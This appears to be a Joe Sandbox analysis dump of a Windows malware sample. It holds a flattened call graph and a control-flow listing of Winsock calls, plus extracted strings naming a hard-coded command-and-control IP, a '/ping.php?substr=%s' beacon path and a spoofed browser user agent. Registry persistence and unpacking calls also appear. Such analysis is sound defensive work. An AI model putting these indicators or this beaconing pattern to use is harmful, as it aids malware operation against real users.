39229 426510 39030->39229 39032 425929 39033 42676c 63 API calls 39032->39033 39036 425b35 ___scrt_fastfail 39033->39036 39034 425fb4 39250 4019f8 26 API calls 39034->39250 39037 426582 51 API calls 39036->39037 39049 425cfd 39036->39049 39038 425ba4 ___scrt_fastfail 39037->39038 39039 426582 51 API calls 39038->39039 39040 425bc7 ___scrt_fastfail 39039->39040 39040->39040 39041 426242 3 API calls 39040->39041 39042 425cbb 39041->39042 39043 425cc0 CreateDirectoryA 39042->39043 39042->39049 39236 42628b 39043->39236 39045 425ce2 39046 401b1e 27 API calls 39045->39046 39045->39049 39047 425cf8 39046->39047 39048 426510 29 API calls 39047->39048 39048->39049 39049->39034 39050 42676c 63 API calls 39049->39050 39052 425eff ___scrt_fastfail 39050->39052 39053 426582 51 API calls 39052->39053 39057 425f9b 39052->39057 39054 425f6d 39053->39054 39055 426242 3 API calls 39054->39055 39056 425f7f 39055->39056 39056->39057 39058 401b1e 27 API calls 39056->39058 39249 4019f8 26 API calls 39057->39249 39059 425f96 39058->39059 39060 426510 29 API calls 39059->39060 39060->39057 39702 4138ce 39061->39702 39064->38944 39065->38947 39066->38949 39070->38938 39072->38967 39073->38969 39074->38972 39075->38974 39077 409ba0 GetStartupInfoW 39076->39077 39077->38978 39079 41e09a 39078->39079 39081 41e0a3 39078->39081 39083 41df90 51 API calls 4 library calls 39079->39083 39081->38981 39082->38981 39083->39081 39085 4034c0 39084->39085 39086 4034d9 39084->39086 39085->39086 39252 40e509 46 API calls 39085->39252 39088 401b52 39086->39088 39253 402d13 39088->39253 39090 401b68 39090->38992 39092 4265c6 __EH_prolog 39091->39092 39284 403e0c 39092->39284 39094 4265ea 39094->39094 39095 402c71 27 API calls 39094->39095 39096 42664f 39095->39096 39298 404097 39096->39298 39098 4266fe 39102 42671a std::ios_base::_Ios_base_dtor 39098->39102 39315 40387f 26 API calls _Deallocate 39098->39315 39101 4266d6 39105 402c50 27 API calls 39101->39105 39311 402bef 39102->39311 39103 402c71 27 API calls 39103->39101 39107 4266f6 39105->39107 39109 402bef 26 API calls 39107->39109 39108 402bef 26 API calls 39110 424ab8 39108->39110 39109->39098 39110->38996 39112 426054 __EH_prolog 39111->39112 39445 401bb2 39112->39445 39117 4260b3 39461 401a16 39117->39461 39118 426097 39482 401b6f 39118->39482 39121 4260c0 39464 4024a1 39121->39464 39124 4260aa std::ios_base::_Ios_base_dtor 39124->39001 39128 42610e 39129 401b6f 68 API calls 39128->39129 39129->39124 39131 4034ed __EH_prolog 39130->39131 39633 401056 39131->39633 39133 403513 39134 401056 50 API calls 39133->39134 39135 403542 39134->39135 39637 40399f 39135->39637 39137 403553 39137->39011 39139 426776 __EH_prolog 39138->39139 39140 401b1e 27 API calls 39139->39140 39141 426b3f 39140->39141 39675 401aa1 39141->39675 39143 426b55 39144 401aa1 27 API calls 39143->39144 39145 426bdc 39144->39145 39146 401aa1 27 API calls 39145->39146 39147 426be9 39146->39147 39148 401aa1 27 API calls 39147->39148 39149 426c4c 39148->39149 39150 401aa1 27 API calls 39149->39150 39151 426c5d 39150->39151 39152 401aa1 27 API calls 39151->39152 39153 426c6a 39152->39153 39154 401aa1 27 API calls 39153->39154 39155 426d15 39154->39155 39156 401aa1 27 API calls 39155->39156 39157 42700c 39156->39157 39158 401aa1 27 API calls 39157->39158 39159 4272bb 39158->39159 39160 401aa1 27 API calls 39159->39160 39186 4272c8 39160->39186 39161 4273e4 39162 401aa1 27 API calls 39161->39162 39163 4273f1 WSAStartup 39162->39163 39164 42740b socket 39163->39164 39185 427642 39163->39185 39165 427423 39164->39165 39166 427438 39164->39166 39168 42742c WSACleanup 39165->39168 39167 427440 gethostbyname 39166->39167 39169 427451 ctype 39167->39169 39167->39185 39171 4277f3 39168->39171 39172 427464 htons connect 39169->39172 39170 4277e6 WSACleanup closesocket 39170->39171 39171->39013 39173 427493 39172->39173 39172->39185 39174 4274a5 send 39173->39174 39175 4274b5 39174->39175 39174->39185 39176 4274bb send 39175->39176 39180 4274d1 ___scrt_fastfail 39175->39180 39176->39180 39176->39185 39177 4274f7 recv 39177->39180 39177->39185 39178 427635 39179 42763c 39178->39179 39181 42777d 39178->39181 39199 427651 39178->39199 39179->39185 39179->39199 39180->39177 39180->39178 39180->39185 39190 412faf 46 API calls 39180->39190 39681 411957 42 API calls 39180->39681 39183 42779d recv 39181->39183 39181->39185 39182 427675 recv 39182->39185 39182->39199 39183->39181 39183->39185 39185->39170 39186->39161 39188 401aa1 27 API calls 39186->39188 39187 427770 39187->39185 39189 4273b4 39188->39189 39679 403ae1 27 API calls 39189->39679 39190->39180 39193 4273bf 39680 401ac2 27 API calls 39193->39680 39195 4273cc 39198 401aa1 27 API calls 39195->39198 39197 427712 recv 39197->39185 39197->39199 39198->39161 39199->39182 39199->39185 39199->39187 39199->39197 39200 42773d recv 39199->39200 39682 411957 42 API calls 39199->39682 39683 426148 22 API calls 39199->39683 39200->39185 39200->39199 39689 42780c 39201->39689 39203 426164 RegCreateKeyExA 39204 426222 39203->39204 39205 426197 39203->39205 39206 42529e 39204->39206 39207 426228 RegCloseKey 39204->39207 39208 402c71 27 API calls 39205->39208 39248 4019f8 26 API calls 39206->39248 39207->39206 39209 4261c0 39208->39209 39210 402c71 27 API calls 39209->39210 39211 4261e9 RegSetValueExA 39210->39211 39212 402bef 26 API calls 39211->39212 39213 42621a 39212->39213 39214 402bef 26 API calls 39213->39214 39214->39204 39216 403579 __EH_prolog 39215->39216 39217 401056 50 API calls 39216->39217 39218 40359c 39217->39218 39219 401056 50 API calls 39218->39219 39220 4035c8 39219->39220 39221 40399f 27 API calls 39220->39221 39222 4035d9 39221->39222 39222->39009 39690 410c7b 39223->39690 39225 426594 39225->39025 39225->39225 39227 42590d 39226->39227 39228 426269 WriteFile FindCloseChangeNotification 39226->39228 39227->39029 39227->39032 39228->39227 39230 426521 39229->39230 39230->39230 39231 426529 ShellExecuteExA 39230->39231 39232 426575 39231->39232 39233 42655e WaitForSingleObject CloseHandle 39231->39233 39234 402bef 26 API calls 39232->39234 39233->39232 39235 42657d 39234->39235 39235->39032 39701 427830 39236->39701 39238 426297 CoInitialize CoCreateInstance 39239 4262ef MultiByteToWideChar SysAllocStringLen 39238->39239 39247 4262d1 __except_handler3 39238->39247 39241 426324 39239->39241 39241->39241 39242 42632b MultiByteToWideChar 39241->39242 39243 42633f 39242->39243 39243->39243 39244 426346 MultiByteToWideChar SysAllocStringLen 39243->39244 39245 426368 39244->39245 39245->39245 39246 42636f MultiByteToWideChar 39245->39246 39246->39247 39247->39045 39252->39085 39254 402d2a 39253->39254 39255 402d31 ctype 39254->39255 39257 403859 39254->39257 39255->39090 39258 403866 39257->39258 39259 40386f 39257->39259 39264 4039ce 39258->39264 39260 40387b 39259->39260 39273 409256 39259->39273 39260->39255 39263 40386c 39263->39255 39265 409256 std::_Facet_Register 8 API calls 39264->39265 39266 4039e5 39265->39266 39267 4039f7 39266->39267 39268 4039ec 39266->39268 39280 41088a 26 API calls 4 library calls 39267->39280 39268->39263 39270 410924 39281 410932 11 API calls _Atexit 39270->39281 39272 410931 39275 40925b ___crtLCMapStringA 39273->39275 39274 409275 39274->39263 39275->39274 39277 409277 std::_Facet_Register 39275->39277 39282 412ede 7 API calls 2 library calls 39275->39282 39283 40abcb RaiseException 39277->39283 39279 40996c 39280->39270 39281->39272 39282->39275 39283->39279 39285 403e16 __EH_prolog 39284->39285 39316 407d73 39285->39316 39287 403e38 39326 404189 39287->39326 39293 403e7f 39364 4044e5 39293->39364 39296 403e8b 39385 4043fe 39296->39385 39299 4040a1 __EH_prolog 39298->39299 39305 4040b2 39299->39305 39438 40429b 27 API calls __EH_prolog 39299->39438 39301 4040d9 39439 404777 27 API calls 39301->39439 39303 404152 39443 404238 26 API calls _Deallocate 39303->39443 39305->39098 39305->39101 39305->39103 39307 404144 39442 404777 27 API calls 39307->39442 39310 4040e9 39310->39303 39310->39307 39440 404777 27 API calls 39310->39440 39441 404579 26 API calls 39310->39441 39312 402c03 39311->39312 39313 402bfa 39311->39313 39312->39108 39444 40387f 26 API calls _Deallocate 39313->39444 39315->39102 39317 407d7f __EH_prolog3 39316->39317 39389 407b1c 39317->39389 39322 407d9d 39403 407f02 40 API calls _Atexit 39322->39403 39323 407dfb std::locale::_Locimp::_Locimp_dtor 39323->39287 39325 407da5 _Yarn 39395 407b74 39325->39395 39327 404193 __EH_prolog 39326->39327 39328 407b1c std::_Lockit::_Lockit 2 API calls 39327->39328 39329 4041a2 39328->39329 39408 401318 39329->39408 39331 4041cc 39333 407b74 std::_Lockit::~_Lockit 2 API calls 39331->39333 39332 4041b9 std::locale::_Getfacet 39332->39331 39414 40436e 55 API calls 3 library calls 39332->39414 39335 403e49 39333->39335 39342 4033ea 39335->39342 39336 4041dc 39337 4041e3 39336->39337 39338 404219 39336->39338 39415 407d41 8 API calls std::_Facet_Register 39337->39415 39416 40abcb RaiseException 39338->39416 39341 40422f 39343 4033f4 __EH_prolog 39342->39343 39344 407b1c std::_Lockit::_Lockit 2 API calls 39343->39344 39345 403403 39344->39345 39346 401318 int 4 API calls 39345->39346 39347 40341a std::locale::_Getfacet 39346->39347 39355 40342d 39347->39355 39417 401429 55 API calls 2 library calls 39347->39417 39348 407b74 std::_Lockit::~_Lockit 2 API calls 39350 40346a 39348->39350 39358 404424 39350->39358 39351 40343d 39352 403444 39351->39352 39353 40347a 39351->39353 39418 407d41 8 API calls std::_Facet_Register 39352->39418 39419 40abcb RaiseException 39353->39419 39355->39348 39357 403490 39359 40442e __EH_prolog 39358->39359 39420 404d6b 39359->39420 39361 404463 39362 409256 std::_Facet_Register 8 API calls 39361->39362 39363 40447e 39362->39363 39363->39293 39365 4044ef __EH_prolog 39364->39365 39432 405177 8 API calls std::_Facet_Register 39365->39432 39367 40450d 39433 405025 29 API calls std::_Facet_Register 39367->39433 39369 404517 39370 404571 39369->39370 39371 40451e 39369->39371 39436 404efe 27 API calls 39370->39436 39434 405119 8 API calls std::_Facet_Register 39371->39434 39374 404528 39435 405e85 8 API calls std::_Facet_Register 39374->39435 39376 404531 39376->39296 39386 403eb8 39385->39386 39387 404406 39385->39387 39386->39094 39437 40387f 26 API calls _Deallocate 39387->39437 39390 407b32 39389->39390 39391 407b2b 39389->39391 39393 407b30 39390->39393 39405 408745 EnterCriticalSection 39390->39405 39404 411a5a EnterCriticalSection std::_Lockit::_Lockit 39391->39404 39393->39325 39402 407edf 8 API calls 2 library calls 39393->39402 39396 411a63 39395->39396 39397 407b7e 39395->39397 39407 411a43 LeaveCriticalSection 39396->39407 39398 407b91 39397->39398 39406 408753 LeaveCriticalSection 39397->39406 39398->39323 39401 411a6a 39401->39323 39402->39322 39403->39325 39404->39393 39405->39393 39406->39398 39407->39401 39409 401324 39408->39409 39410 401348 39408->39410 39411 407b1c std::_Lockit::_Lockit 2 API calls 39409->39411 39410->39332 39412 40132e 39411->39412 39413 407b74 std::_Lockit::~_Lockit 2 API calls 39412->39413 39413->39410 39414->39336 39415->39331 39416->39341 39417->39351 39418->39355 39419->39357 39423 404eb6 39420->39423 39422 404d85 39422->39361 39422->39422 39424 404ed2 39423->39424 39425 404ece 39423->39425 39426 404ef8 39424->39426 39427 404eda 39424->39427 39425->39422 39431 4030f6 27 API calls 39426->39431 39428 403859 27 API calls 39427->39428 39428->39425 39432->39367 39433->39369 39434->39374 39435->39376 39437->39386 39438->39301 39439->39310 39440->39310 39441->39310 39442->39303 39444->39312 39446 401bbc __EH_prolog 39445->39446 39486 40307c 39446->39486 39452 401c1f 39453 401c51 39452->39453 39504 40187f 42 API calls 2 library calls 39452->39504 39455 402403 39453->39455 39456 40240d __EH_prolog 39455->39456 39522 402b06 39456->39522 39459 402441 39459->39117 39459->39118 39568 402baa 39461->39568 39463 401a30 ___scrt_fastfail 39463->39121 39465 4024ab __EH_prolog 39464->39465 39466 4024e4 39465->39466 39577 40187f 42 API calls 2 library calls 39465->39577 39468 402b06 42 API calls 39466->39468 39469 4024ee 39468->39469 39470 402551 39469->39470 39473 401d87 65 API calls 39469->39473 39474 40257c 39470->39474 39471 402511 39471->39470 39578 40187f 42 API calls 2 library calls 39471->39578 39473->39471 39475 402586 __EH_prolog 39474->39475 39476 402b06 42 API calls 39475->39476 39479 4025a8 39476->39479 39477 40265a 39485 402b87 26 API calls _Deallocate 39477->39485 39480 4025d8 39479->39480 39579 401f2b 39479->39579 39480->39477 39583 40187f 42 API calls 2 library calls 39480->39583 39621 4023b6 39482->39621 39484 401b95 39484->39124 39485->39128 39487 403086 __EH_prolog 39486->39487 39505 403175 39487->39505 39490 402fe5 39491 402fef __EH_prolog 39490->39491 39492 409256 std::_Facet_Register 8 API calls 39491->39492 39493 403005 39492->39493 39494 407d73 std::locale::_Init 43 API calls 39493->39494 39495 403013 39494->39495 39516 402e7b 39495->39516 39498 402f6b 39499 402f75 __EH_prolog 39498->39499 39500 402e7b 26 API calls 39499->39500 39503 402fbf std::ios_base::_Ios_base_dtor 39499->39503 39501 402f9d 39500->39501 39521 4035f5 55 API calls 7 library calls 39501->39521 39503->39452 39504->39453 39506 40317f __EH_prolog 39505->39506 39507 409256 std::_Facet_Register 8 API calls 39506->39507 39508 4031b9 39507->39508 39509 407d73 std::locale::_Init 43 API calls 39508->39509 39510 4031c6 39509->39510 39511 4033ea 55 API calls 39510->39511 39512 4031f5 std::ios_base::_Ios_base_dtor 39511->39512 39513 401bec 39512->39513 39515 40187f 42 API calls 2 library calls 39512->39515 39513->39490 39515->39513 39517 401c0f 39516->39517 39518 402ed9 39516->39518 39517->39498 39520 40e7d7 26 API calls 2 library calls 39518->39520 39520->39517 39521->39503 39523 402b10 __EH_prolog 39522->39523 39534 403101 39523->39534 39526 401d87 39527 401d99 39526->39527 39533 401df4 39527->39533 39542 402dfd 39527->39542 39530 401de1 39530->39533 39551 40fd67 39530->39551 39533->39459 39536 40310b __EH_prolog 39534->39536 39535 403128 39537 40241d 39535->39537 39541 40187f 42 API calls 2 library calls 39535->39541 39536->39535 39540 403242 42 API calls __EH_prolog 39536->39540 39537->39459 39537->39526 39540->39535 39541->39537 39543 402e0d 39542->39543 39547 401dc4 39542->39547 39543->39547 39562 4022ae 65 API calls 39543->39562 39545 402e1a 39545->39547 39563 40ea7d 65 API calls 2 library calls 39545->39563 39547->39530 39547->39533 39548 4106d4 39547->39548 39549 41049b _Xfiopen 64 API calls 39548->39549 39550 4106ea 39549->39550 39550->39530 39552 40fd72 39551->39552 39553 40fd87 39551->39553 39564 412381 20 API calls _free 39552->39564 39554 40fd9f 39553->39554 39566 412381 20 API calls _free 39553->39566 39554->39533 39557 40fd77 39565 410905 26 API calls _Deallocate 39557->39565 39558 40fd94 39567 410905 26 API calls _Deallocate 39558->39567 39560 40fd82 39560->39533 39562->39545 39563->39547 39564->39557 39565->39560 39566->39558 39567->39554 39569 402bc6 39568->39569 39570 402bc2 39568->39570 39571 402be9 39569->39571 39572 402bce 39569->39572 39570->39463 39576 4030f6 27 API calls 39571->39576 39574 403859 27 API calls 39572->39574 39574->39570 39577->39466 39578->39470 39580 401f52 ctype 39579->39580 39582 401f3f 39579->39582 39580->39582 39584 4102e9 39580->39584 39582->39480 39583->39477 39587 410306 39584->39587 39586 410301 39586->39582 39588 410312 __FrameHandler3::FrameUnwindToState 39587->39588 39589 410352 39588->39589 39590 410325 ___scrt_fastfail 39588->39590 39591 41034a std::_Xfsopen 39588->39591 39600 40e81d EnterCriticalSection 39589->39600 39614 412381 20 API calls _free 39590->39614 39591->39586 39594 41035c 39601 41011d 39594->39601 39595 41033f 39615 410905 26 API calls _Deallocate 39595->39615 39600->39594 39604 41012f ___scrt_fastfail 39601->39604 39607 41014c 39601->39607 39602 41013c 39617 412381 20 API calls _free 39602->39617 39604->39602 39604->39607 39609 41018f __fread_nolock 39604->39609 39605 410141 39618 410905 26 API calls _Deallocate 39605->39618 39616 410391 LeaveCriticalSection __fread_nolock 39607->39616 39608 4102ab ___scrt_fastfail 39620 412381 20 API calls _free 39608->39620 39609->39607 39609->39608 39611 4154e8 _Xfiopen 26 API calls 39609->39611 39613 4192ad __fread_nolock 38 API calls 39609->39613 39619 410399 26 API calls 4 library calls 39609->39619 39611->39609 39613->39609 39614->39595 39615->39591 39616->39591 39617->39605 39618->39607 39619->39609 39620->39605 39622 4023dd 39621->39622 39623 4023ef 39622->39623 39625 402f2f 39622->39625 39623->39484 39626 402f3d 39625->39626 39627 402f39 39625->39627 39628 402dfd 65 API calls 39626->39628 39629 402e7b 26 API calls 39627->39629 39630 402f42 39628->39630 39631 402f66 39629->39631 39632 40e228 _Xfiopen 67 API calls 39630->39632 39631->39623 39632->39627 39634 40106d ___scrt_initialize_default_local_stdio_options 39633->39634 39641 40fd43 39634->39641 39638 4039c7 39637->39638 39639 4039bb 39637->39639 39638->39137 39640 402c71 27 API calls 39639->39640 39640->39638 39644 40ead5 39641->39644 39645 40eb15 39644->39645 39646 40eafd 39644->39646 39645->39646 39648 40eb1d 39645->39648 39668 412381 20 API calls _free 39646->39668 39670 40e3f2 38 API calls 2 library calls 39648->39670 39649 40eb02 39669 410905 26 API calls _Deallocate 39649->39669 39651 40eb2d 39671 40eef9 20 API calls _free 39651->39671 39655 40eba5 39672 40f0ad 50 API calls 2 library calls 39655->39672 39656 40107b 39656->39133 39659 40ebb0 39673 40ef2e 20 API calls _free 39659->39673 39660 40eb0d 39661 4097a5 39660->39661 39662 4097b0 IsProcessorFeaturePresent 39661->39662 39663 4097ae 39661->39663 39665 409efa 39662->39665 39663->39656 39674 409ebe SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 39665->39674 39667 409fdd 39667->39656 39668->39649 39669->39660 39670->39651 39671->39655 39672->39659 39673->39660 39674->39667 39676 401aab 39675->39676 39676->39676 39684 402cba 39676->39684 39678 401abd 39678->39143 39679->39193 39680->39195 39681->39180 39682->39199 39683->39199 39685 402cfa 39684->39685 39687 402cd0 BuildCatchObjectHelperInternal 39684->39687 39688 4037a9 27 API calls 2 library calls 39685->39688 39687->39678 39688->39687 39689->39203 39691 410c87 39690->39691 39692 410c9c 39690->39692 39698 412381 20 API calls _free 39691->39698 39700 410965 51 API calls 4 library calls 39692->39700 39695 410c8c 39699 410905 26 API calls _Deallocate 39695->39699 39696 410c97 39696->39225 39698->39695 39699->39696 39700->39696 39701->39238 39703 4138da _Atexit 39702->39703 39704 4138e1 39703->39704 39705 4138f3 39703->39705 39738 413a28 GetModuleHandleW 39704->39738 39726 4119fb EnterCriticalSection 39705->39726 39708 4138e6 39708->39705 39739 413a6c GetModuleHandleExW 39708->39739 39713 4138fa 39721 413998 39713->39721 39723 41396f 39713->39723 39747 4151ba 20 API calls _Atexit 39713->39747 39714 4139e1 39750 424569 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 39714->39750 39715 4139b5 39730 4139e7 39715->39730 39727 4139d8 39721->39727 39725 413987 39723->39725 39748 41381a 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 39723->39748 39749 41381a 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 39725->39749 39726->39713 39751 411a43 LeaveCriticalSection 39727->39751 39729 4139b1 39729->39714 39729->39715 39752 4177fa 39730->39752 39733 413a15 39736 413a6c _Atexit 8 API calls 39733->39736 39734 4139f5 GetPEB 39734->39733 39735 413a05 GetCurrentProcess TerminateProcess 39734->39735 39735->39733 39737 413a1d ExitProcess 39736->39737 39738->39708 39740 413a96 GetProcAddress 39739->39740 39741 413ab9 39739->39741 39744 413aab 39740->39744 39742 413ac8 39741->39742 39743 413abf FreeLibrary 39741->39743 39745 4097a5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 39742->39745 39743->39742 39744->39741 39746 4138f2 39745->39746 39746->39705 39747->39723 39748->39725 39749->39721 39751->39729 39753 417815 39752->39753 39754 41781f 39752->39754 39756 4097a5 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 39753->39756 39759 4171b7 5 API calls 2 library calls 39754->39759 39757 4139f1 39756->39757 39757->39733 39757->39734 39758 417836 39758->39753 39759->39758 39760 414003c 39761 4140049 39760->39761 39775 4140e0f SetErrorMode SetErrorMode 39761->39775 39766 4140265 39767 41402ce VirtualProtect 39766->39767 39769 414030b 39767->39769 39768 4140439 VirtualFree 39773 41405f4 LoadLibraryA 39768->39773 39774 41404be 39768->39774 39769->39768 39770 41404e3 LoadLibraryA 39770->39774 39772 41408c7 39773->39772 39774->39770 39774->39773 39776 4140223 39775->39776 39777 4140d90 39776->39777 39778 4140dad 39777->39778 39779 4140dbb GetPEB 39778->39779 39780 4140238 VirtualAlloc 39778->39780 39779->39780 39780->39766 39781 41e5177 39782 41e517a 39781->39782 39785 41e5436 39782->39785 39786 41e5445 39785->39786 39789 41e5bd6 39786->39789 39790 41e5bf1 39789->39790 39791 41e5bfa CreateToolhelp32Snapshot 39790->39791 39792 41e5c16 Module32First 39790->39792 39791->39790 39791->39792 39793 41e5435 39792->39793 39794 41e5c25 39792->39794 39796 41e5895 39794->39796 39797 41e58c0 39796->39797 39798 41e5909 39797->39798 39799 41e58d1 VirtualAlloc 39797->39799 39798->39798 39799->39798 39800 4264f9 SysFreeString SysFreeString CoUninitialize 39801 41870f 39802 41871b __FrameHandler3::FrameUnwindToState 39801->39802 39803 418727 39802->39803 39804 41873e 39802->39804 39835 412381 20 API calls _free 39803->39835 39814 40e81d EnterCriticalSection 39804->39814 39807 41874e 39815 41878b 39807->39815 39808 41872c 39836 410905 26 API calls _Deallocate 39808->39836 39811 41875a 39837 418781 LeaveCriticalSection __fread_nolock 39811->39837 39813 418737 std::_Xfsopen 39814->39807 39816 4187b3 39815->39816 39817 418799 39815->39817 39819 4154e8 _Xfiopen 26 API calls 39816->39819 39841 412381 20 API calls _free 39817->39841 39821 4187bc 39819->39821 39820 41879e 39842 410905 26 API calls _Deallocate 39820->39842 39838 4197e5 39821->39838 39825 4188c0 39827 4188cd 39825->39827 39830 418873 39825->39830 39826 418844 39829 418861 39826->39829 39826->39830 39844 412381 20 API calls _free 39827->39844 39843 418aa4 31 API calls 3 library calls 39829->39843 39832 4187a9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39830->39832 39845 418920 30 API calls 2 library calls 39830->39845 39832->39811 39833 41886b 39833->39832 39835->39808 39836->39813 39837->39813 39846 419662 39838->39846 39840 4187d8 39840->39825 39840->39826 39840->39832 39841->39820 39842->39832 39843->39833 39844->39832 39845->39832 39847 41966e __FrameHandler3::FrameUnwindToState 39846->39847 39848 419676 39847->39848 39849 41968e 39847->39849 39872 41236e 20 API calls _free 39848->39872 39851 419742 39849->39851 39856 4196c6 39849->39856 39877 41236e 20 API calls _free 39851->39877 39852 41967b 39873 412381 20 API calls _free 39852->39873 39855 419747 39878 412381 20 API calls _free 39855->39878 39871 41e5cd EnterCriticalSection 39856->39871 39859 41974f 39879 410905 26 API calls _Deallocate 39859->39879 39860 4196cc 39862 4196f0 39860->39862 39863 419705 39860->39863 39874 412381 20 API calls _free 39862->39874 39865 419767 _Xfiopen 28 API calls 39863->39865 39868 419700 39865->39868 39866 4196f5 39875 41236e 20 API calls _free 39866->39875 39867 419683 std::_Xfsopen 39867->39840 39876 41973a LeaveCriticalSection __wsopen_s 39868->39876 39871->39860 39872->39852 39873->39867 39874->39866 39875->39868 39876->39867 39877->39855 39878->39859 39879->39867

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 0 42676c-4272ca call 42780c call 403491 * 15 call 40197c call 403491 * 14 call 40197c call 403491 * 17 call 40197c call 403491 * 7 call 40197c call 403491 * 2 call 40197c call 403491 * 2 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 401b1e call 401a67 call 401aa1 call 403491 * 9 call 40197c call 401aa1 * 2 call 403491 * 6 call 40197c call 401aa1 call 401a67 call 401aa1 * 2 call 403491 * 12 call 40197c call 401aa1 call 403491 * 61 call 40197c call 401aa1 call 403491 * 55 call 40197c call 401aa1 * 2 473 4272d0-4272d3 0->473 474 4273e4-427405 call 401aa1 WSAStartup 0->474 473->474 476 4272d9-4273df call 403491 * 16 call 40197c call 401aa1 call 403ae1 call 401ac2 call 401ae8 call 401aa1 473->476 479 42740b-427421 socket 474->479 480 4277d9 474->480 476->474 483 427423-427433 call 40ff7e WSACleanup 479->483 484 427438-42744b call 401a67 gethostbyname 479->484 482 4277dc-4277e5 call 40ff7e 480->482 496 4277e6-4277ed WSACleanup closesocket 482->496 497 4277f3-42780b call 401ae8 483->497 484->482 494 427451-42748d call 40ac40 htons connect 484->494 494->482 504 427493-4274af call 403da5 call 401a67 send 494->504 496->497 504->482 514 4274b5-4274b9 504->514 516 4274d1-4274f5 call 40b740 514->516 517 4274bb-4274cb send 514->517 524 4274f7-42750b recv 516->524 517->482 517->516 524->482 525 427511-427516 524->525 528 42761e-427627 525->528 529 42751c-427524 525->529 528->482 532 42762d-427630 528->532 529->528 531 42752a-427532 529->531 531->528 534 427538-427543 531->534 532->524 536 427545-42755a call 412faf 534->536 537 427568-427571 534->537 536->482 545 427560-427563 536->545 540 427574-427579 537->540 540->540 543 42757b-42757d 540->543 546 427583-427598 call 403a0c 543->546 547 427635-42763a 543->547 549 427615-42761b 545->549 546->549 562 42759a-4275ba call 412faf 546->562 551 427647-42764b 547->551 552 42763c-427640 547->552 549->528 554 427651-42766d call 426152 551->554 555 42777d-42777f 551->555 553 427642 552->553 552->554 553->482 570 427670-427672 554->570 560 4277c3-4277d0 call 426152 555->560 561 427781-42779a call 426152 555->561 575 4277d2-4277d7 560->575 578 42779d-4277b0 recv 561->578 573 4275de-4275f6 call 412faf 562->573 574 4275bc-4275d6 call 411957 562->574 576 427675-427689 recv 570->576 573->549 591 4275f8-427612 call 412faf 573->591 574->482 590 4275dc 574->590 575->496 576->482 582 42768f-427694 576->582 578->482 579 4277b2-4277bf 578->579 579->578 584 4277c1 579->584 587 427763-42776a 582->587 588 42769a-42769f 582->588 584->575 587->576 592 427770 587->592 588->587 593 4276a5-4276aa 588->593 590->549 591->549 592->482 593->587 597 4276b0-4276d1 call 411957 593->597 597->482 604 4276d7-4276d9 597->604 604->482 606 4276df 604->606 608 427772-42777b 606->608 609 4276e5-4276f1 606->609 608->575 610 4276f3-42770a call 426148 609->610 611 42770d-42770f 609->611 610->611 614 427712-427728 recv 611->614 614->482 617 42772e-42773b 614->617 617->614 618 42773d-42774f recv 617->618 618->482 619 427755-42775e 618->619 619->570
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 00426771
                                                                                                                                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 004273FD
                                                                                                                                                                                                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00427413
                                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 0042742D
                                                                                                                                                                                                                                      • gethostbyname.WS2_32(00000000), ref: 00427441
                                                                                                                                                                                                                                      • htons.WS2_32(?), ref: 00427473
                                                                                                                                                                                                                                      • connect.WS2_32(00000000,?,00000010), ref: 00427484
                                                                                                                                                                                                                                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 004274A7
                                                                                                                                                                                                                                      • send.WS2_32(00000000,00000000,?,00000000), ref: 004274C3
                                                                                                                                                                                                                                      • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 00427503
                                                                                                                                                                                                                                      • recv.WS2_32(?,00000000,00000001,00000000), ref: 00427681
                                                                                                                                                                                                                                      • recv.WS2_32(?,?,00000000,00000000), ref: 00427720
                                                                                                                                                                                                                                      • recv.WS2_32(?,0000000A,00000002,00000000), ref: 00427747
                                                                                                                                                                                                                                      • recv.WS2_32(00000000,?,?,00000000), ref: 004277A8
                                                                                                                                                                                                                                      • WSACleanup.WS2_32 ref: 004277E6
                                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 004277ED
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                      • String ID: HTTP/1.1$(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36$/ping.php?substr=%s$185.172.128.228$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
                                                                                                                                                                                                                                      • API String ID: 791229064-1542616328
                                                                                                                                                                                                                                      • Opcode ID: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
                                                                                                                                                                                                                                      • Instruction ID: 4e55451fc037eb126e07087a8435dc815b4e607a9865e0499e256671a6cdd487
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F39287209062E19ACB02FFB56C5659E7FF4591530D714747FE690AF393CB2C86088B9E
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

